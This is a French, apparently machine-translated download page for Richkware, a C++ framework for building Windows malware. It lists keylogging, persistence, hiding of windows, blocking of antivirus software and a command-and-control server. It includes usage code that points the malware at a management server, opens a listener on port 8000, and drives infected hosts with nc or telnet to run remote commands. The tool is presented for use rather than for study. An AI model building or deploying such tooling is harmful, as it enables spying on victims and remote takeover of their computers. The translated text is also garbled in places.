Page d'accueil>Lié à la programmation>C/C++
Télécharger

Richesse

Framework de création de logiciels malveillants Windows, écrits en C ++.

Description

Richkware est une bibliothèque de fonctions de réseau et de système d'exploitation, que vous pouvez utiliser pour créer des logiciels malveillants. La composition de ces fonctions permet à l'application de supposer des comportements référés aux types de logiciels malveillants suivants:

  • Virus
  • Vers
  • Bot
  • Logiciel espion
  • Clés
  • Effrayant

Projets connexes

Richkware-Manager-Server: Service pour la gestion des hôtes dans lesquels est présent une instance de logiciels malveillants développée à l'aide de Richkware Framework.

Richkware-Manager-Client: Client de Richkware-Manager-Server , qu'il obtient la liste de tous les hôtes du serveur et qu'il est en mesure de leur envoyer des commandes.

Documentation

En IL
Présentation Pdf Pdf
Rapport Pdf Pdf

Fonctions

Réseau

  • Server ( Network.h ): module pour la gestion d'un serveur multi-thread, qui permettent de recevoir des commandes d'Internet (Richkware-Manager-Client ou Console) en fonction du protocole spécifique.
    • Protocole ( protocole.h ):
      1. Exécution à distance de commande (ID 1)
      2. (travail en cours)
  • Réseau ( réseau.h ):
    • RawRequest : Envoyez une demande à un serveur;
    • UploadInfotorichkwareManagerserver : Envoyez des informations à Richkware-Manager-Server

Système

  • Storage ( Storage.H ):

    • Économie d'économie et chargement : enregistrez l'état de demande (crypté) à:
      • Enregistrer (SaveValueReg et LoadValueReg)
      • Fichier (SaveValuetoFile et LoadValueFromFile)
    • Persistance : s'installez en permanence dans le système.

  • IsAdmin et DemandeAdMinprivileges ( Richkware.h ): Vérifiez et exigez les privilèges de l'administrateur;

  • SpealthWindow ( Richkware.h ): Masquer les applications;

  • OpenApp ( Richkware.h ): applications arbitraires ouvertes;

  • KeyLogger ( Richkware.h ): stocke dans un fichier toutes les touches appuyées;

  • BlockApps E UnblockApps ( BlockApps.h ): applications Block and Unblock (antivirus, ...).

Cryptographie

  • Encrypter et décrypter ( crypto.h ): RC4 (par défaut), Blowfish.
  • Encoder et Decode ( Crypto.H ): Base64 (Defualt), Hex.

Autre

  • Randmouse ( Richkware.h ): Déplacez-vous au hasard le curseur de la souris;
  • Hibernation ( Richkware.h ): Système Hibernate.

Exigences

Ce sont les exigences de base pour créer et utiliser Richkware:

  • Faire ou cmake
  • Mingw

Commencer

Ouvrez main.cpp et créez une instance de Richkware.

Avec Richkware-Manager-Server

Si vous avez déployé RMS, vous pouvez initialiser les logiciels malveillants comme suit: 

    int main() {
           Richkware richkware("Richk","DefaultPassword","192.168.99.100", "8080", "associatedUser");
            ...
            return 0;
        }

qu'il obtient une clé sécurisée de Richkware-Manager-Server et qu'il définit la clé en tant que clé de cryptage. DefaultPass est utilisé comme clé de chiffrement temporaire pour assurer une communication sécurisée avec RMS et si le malware ne peut pas atteindre le RMS pour obtenir son KET de cryptage, il utilisera DefaultPass comme clé de cryptage.

Sans Richkware-Manager-Server

Sinon, si vous n'avez pas déployé RMS, vous pouvez utiliser: 

 Richkware richkware("Richk","richktest");

De cette façon, il utilise "Richktest" comme clé de chiffrement.

Compiler

Après la mise en œuvre de Main.cpp , vous pouvez compiler comme suit.

Utilisation de Mingw pour Windows ou Mingw Cross Compiler pour Linux Build Environment 

 make

Utilisation du compilateur Microsoft C ++ (Visual Studio)

  • C / C ++> PRÉSCROCESSEUR> Définitions du préprocesseur, ajoutez "_Crt_Secure_No_Warnings"
  • Linker> Entrée> dépendances supplémentaires, ajouter "WS2_32.lib"

Exemples d'utilisation

Dans l'exemple suivant, nous appelons " serveur ", un malware développé à l'aide de Richkware Framework et dans lequel il a été activé la fonction de création d'un serveur et " client ", le créateur (pirate) du malware qui essaie d'établir une connexion avec le PC infecté.

Côté serveur

Exécution à distance de commande

Fonction de framework d'appel StartServer Dans le principal, il démarre le serveur sur un port, dans l'exemple suivant est le port TCP 8000. N'oubliez pas que si un port est déjà utilisé par un autre programme, vous ne pouvez pas utiliser ce port, jusqu'à ce que le programme soit arrêté. 

 int main () {
    ...
	richkware.network.server.Start("8000");
    ...
}

Côté client

Connectez-vous à l'aide de Richkware-Manager-Client

Dans tous les systèmes où la machine virtuelle Java est installée, vous pouvez utiliser Richkware-Manager-Client, sinon s'il n'est pas présent, vous pouvez facilement utiliser un terminal.

Connectez-vous à l'aide de Terminal dans Unix Systems

Dans Unix Systems, vous pouvez utiliser NetCAT et exécuter la commande suivante: 

 nc <serverName> 8000

Si le serveur a reçu la demande sur le port ouvert et qu'il réussit à créer une connexion, il répond au client confirmant l'établissement de la connexion, après cela, vous pouvez écrire: 

 [[1]]COMMAND

la commande est une commande qui doit être exécutée sur l'hôte infecté où le serveur s'exécute.

Connectez-vous en utilisant le terminal sous Windows

Dans Windows, vous pouvez utiliser Telnet , de la même manière: 

 telnet <serverName> 8000

... 

 [[1]]COMMAND
Développer
Informations supplémentaires
Applications connexes
Recommandé pour vous
Actualités connexes Tout